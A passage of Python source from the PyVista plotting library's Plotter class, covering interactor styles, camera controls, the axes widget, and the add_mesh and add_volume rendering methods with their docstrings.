if key in self._key_press_event_callbacks.keys():
# Note that defaultdict's will never throw a key error
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click"""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
""" sets the interactive style to trackball - the default syle """
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_image_style(self):
""" sets the interactive style to image
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
        - CTRL SHIFT Left Mouse dollies (a positional zoom) the camera
        - Middle mouse button pans the camera
        - Right mouse button dollies the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
def enable_joystick_style(self):
""" sets the interactive style to joystick
allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
        camera continues to move even if the mouse is not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
""" sets the interactive style to rubber band zoom
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
""" sets the interactive style to terrain
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
""" sets the interactive style to rubber band picking
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
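    # Hedged usage sketch: any of the enable_*_style helpers above can be
    # swapped in at runtime (assumes an interactive window):
    #
    #   plotter = pyvista.Plotter()
    #   plotter.add_mesh(pyvista.Cone())
    #   plotter.enable_terrain_style()  # azimuth/elevation camera controls
    #   plotter.show()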
def set_focus(self, point):
""" sets focus to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetFocalPoint(point)
self._render()
def set_position(self, point, reset=False):
""" sets camera position to a point """
if isinstance(point, np.ndarray):
if point.ndim != 1:
point = point.ravel()
self.camera.SetPosition(point)
if reset:
self.reset_camera()
self.camera_set = True
self._render()
def set_viewup(self, vector):
""" sets camera viewup vector """
if isinstance(vector, np.ndarray):
if vector.ndim != 1:
vector = vector.ravel()
self.camera.SetViewUp(vector)
self._render()
def _render(self):
""" redraws render window if the render window exists """
if hasattr(self, 'ren_win'):
if hasattr(self, 'render_trigger'):
self.render_trigger.emit()
elif not self._first_time:
self.render()
def add_axes(self, interactive=None, line_width=2,
color=None, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', labels_off=False,
box=None, box_args=None):
""" Add an interactive axes widget """
if interactive is None:
interactive = rcParams['interactive']
if hasattr(self, 'axes_widget'):
self.axes_widget.SetInteractive(interactive)
update_axes_label_color(color)
return
if box is None:
box = rcParams['axes']['box']
if box:
if box_args is None:
box_args = {}
self.axes_actor = create_axes_orientation_box(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel,
labels_off=labels_off, **box_args)
else:
self.axes_actor = create_axes_marker(
label_color=color, line_width=line_width,
x_color=x_color, y_color=y_color, z_color=z_color,
xlabel=xlabel, ylabel=ylabel, zlabel=zlabel, labels_off=labels_off)
self.axes_widget = vtk.vtkOrientationMarkerWidget()
self.axes_widget.SetOrientationMarker(self.axes_actor)
if hasattr(self, 'iren'):
self.axes_widget.SetInteractor(self.iren)
self.axes_widget.SetEnabled(1)
self.axes_widget.SetInteractive(interactive)
return
def hide_axes(self):
"""Hide the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOff()
def show_axes(self):
"""Show the axes orientation widget"""
if hasattr(self, 'axes_widget'):
self.axes_widget.EnabledOn()
else:
self.add_axes()
def isometric_view_interactive(self):
""" sets the current interactive render window to isometric view """
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""
        Update window, redraw, and process messages in the event queue.
        Parameters
        ----------
        stime : int, optional
            Duration of the timer that interrupts vtkRenderWindowInteractor,
            in milliseconds.
force_redraw : bool, optional
Call vtkRenderWindowInteractor.Render() immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self._render()
Plotter.last_update_time = curr_time
else:
if force_redraw:
self.iren.Render()
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
loc=None, backface_culling=False, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, **kwargs):
"""
Adds any PyVista/VTK mesh or dataset that PyVista can wrap to the
        scene. This method uses a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
        opacity : float, str, array-like
            Opacity of the mesh. If a single float value is given, it will be
            the global opacity of the mesh and uniformly applied everywhere -
            should be between 0 and 1. A string can also be specified to map
            the scalar range to a predefined opacity transfer function
            (options include: 'linear', 'linear_r', 'geom', 'geom_r').
            A string could also be used to map a scalar array from the mesh to
            the opacity (must have same number of elements as the
            ``scalars`` argument). Or you can pass a custom-made transfer
            function that is an array either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalar display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
            result in showing colors that are not present in the color map.
cmap : str, optional
            Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
            Scalar bar title. By default the scalar bar is given a title of
            the scalar array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
            datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
render_lines_as_tubes : bool, optional
smooth_shading : bool, optional
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
            The specular power. Between 0.0 and 128.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
        backface_culling : bool, optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
rgb : bool, optional
            If a 2-dimensional array is passed as the scalars, plot those
            values as RGB(A) colors! ``rgba`` is also an accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
            transparency.
below_color : string or 3 item list, optional
Solid color for values below the scalar range (``clim``). This will
automatically set the scalar bar ``below_label`` to ``'Below'``
above_color : string or 3 item list, optional
            Solid color for values above the scalar range (``clim``). This will
automatically set the scalar bar ``above_label`` to ``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
            scalar range to annotate on the scalar bar and the values are the
            string annotations.
pickable : bool
Set whether this mesh is pickable
Returns
-------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
        # Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(mesh)))
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
if clim is None:
clim = kwargs.get('rng', None)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = '{}({})'.format(type(mesh).__name__, str(hex(id(mesh))))
if nan_color is None:
nan_color = rcParams['nan_color']
nanr, nanb, nang = parse_color(nan_color)
nan_color = nanr, nanb, nang, nan_opacity
if color is True:
color = rcParams['color']
        if texture is False:
texture = None
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
self.remove_actor(name, reset_camera=reset_camera)
            # first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalar specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise RuntimeError('Scalar array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.update(kwargs)
the_arguments.pop('self')
the_arguments.pop('mesh')
if multi_colors:
# Compute unique colors for each index of the block
try:
import matplotlib as mpl
from itertools import cycle
cycler = mpl.rcParams['axes.prop_cycle']
colors = cycle(cycler)
except ImportError:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
mesh.compute_normals(cell_normals=False, inplace=True)
if mesh.n_points < 1:
raise RuntimeError('Empty meshes cannot be plotted. Input mesh has zero points.')
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalar components are not vectors/tuples
scalars = mesh.active_scalar_name
# Don't allow plotting of string arrays by default
                if scalars is not None:  # and np.issubdtype(mesh.active_scalar.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor, prop = self.add_actor(self.mapper,
reset_camera=reset_camera,
name=name, loc=loc, culling=backface_culling,
pickable=pickable)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=kwargs.get('preference', 'cell'), err=True)
if stitle is None:
stitle = original_scalar_name
        if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError('Invalid texture type ({})'.format(type(texture)))
if mesh.GetPointData().GetTCoords() is None:
raise AssertionError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=kwargs.get('preference', 'cell'), err=True)
opacity = normalize(opacity)
_custom_opac = True
            except Exception:
                # Or get the opacity transfer function
                opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise RuntimeError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
pass
else:
opacity = opacity_transfer_function(opacity, n_colors)
        if use_transparency and np.max(opacity) <= 1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalar formatting ===================================================
if cmap is None: # grab alias for cmaps: colormap
cmap = kwargs.get('colormap', None)
        if cmap is None:  # Set default map if matplotlib is available
try:
import matplotlib
cmap = rcParams['cmap']
except ImportError:
pass
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# if scalars is a string, then get the first array found with that name
set_active = True
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
                # TODO: If str array, digitize and annotate
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = '{}-digitized'.format(title)
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb is False or rgb is None:
rgb = kwargs.get('rgba', False)
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = '{}-normed'.format(title)
else:
scalars = scalars.ravel()
            if scalars.dtype == bool or (scalars.dtype == np.uint8 and not rgb):
                scalars = scalars.astype(float)
def prepare_mapper(scalars):
# Scalar interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, set_active)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, set_active)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalar range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
try:
from matplotlib.cm import get_cmap
except ImportError:
cmap = None
logging.warning('Please install matplotlib for color maps.')
if cmap is not None:
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
                # Set opacities
                if isinstance(opacity, np.ndarray) and not _custom_opac:
                    ctable[:, -1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = cmap(hue)[:, :3]
# combine colors and alpha into a Nx4 matrix
scalars = np.concatenate((scalars, opacity[:, None]), axis=1)
scalars = (scalars * 255).astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise Exception('Invalid style. Must be one of the following:\n' +
'\t"surface"\n' +
'\t"wireframe"\n' +
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
loc=None, backface_culling=False, multi_colors=False,
blending='composite', mapper='fixed_point',
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, **kwargs):
"""
Adds a volume, rendered using a fixed point ray cast mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalar range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom-made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
backface_culling : bool, optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualization of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'composite'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
scalar array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalar range to annotate on the scalar bar and the values are the
string annotations.
Returns
-------
actor: vtk.vtkVolume
VTK volume of the input data.
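Examples
--------
A minimal sketch, volume rendering a random 3D array (the array and
the opacity choice here are only illustrative):
>>> import numpy as np
>>> import pyvista
>>> vol = np.random.random((30, 30, 30))
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_volume(vol, opacity='linear')
>>> plotter.show() # doctest:+SKIP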
"""
# Handle default arguments
if name is None:
name = '{}({})'.format(type(volume).__name__, str(hex(id(volume))))
if clim is None:
clim = kwargs.get('rng', None)
if scalar_bar_args is None:
scalar_bar_args = {}
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1,1,1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError('Object type ({}) not supported for plotting in PyVista.'.format(type(volume)))
else:
# HACK: Make a copy so the original object is not altered
volume = volume.copy()
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = '{}-{}'.format(name, idx)
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(block, resolution=block_resolution, opacity=opacity,
n_colors=n_colors, cmap=color, flip_scalars=flip_scalars,
reset_camera=reset_camera, name=next_name,
ambient=ambient, categories=categories, loc=loc,
backface_culling=backface_culling, clim=clim,
mapper=mapper, pickable=pickable, **kwargs)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError('Type ({}) not supported for volume rendering at this time. Use `pyvista.UniformGrid`.'.format(type(volume)))
if scalars is None:
# Make sure scalar components are not vectors/tuples
scalars = volume.active_scalar
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
if stitle is None:
stitle = volume.active_scalar_info[1]
else:
raise RuntimeError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data' if stitle is None else stitle
set_active = False
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars,
preference=kwargs.get('preference', 'point'), err=True)
if stitle is None:
stitle = title
else:
set_active = True
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(float)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point' : vtk.vtkFixedPointVolumeRayCastMapper,
'gpu' : vtk.vtkGPUVolumeRayCastMapper,
'open_gl' : vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart' : vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise RuntimeError('Mapper ({}) unknown. Available volume mappers include: {}'.format(mapper, ', '.join(mappers.keys())))
self.mapper = make_mapper(mappers[mapper])
# Scalar interpolation approach
if scalars.shape[0] == volume.n_points:
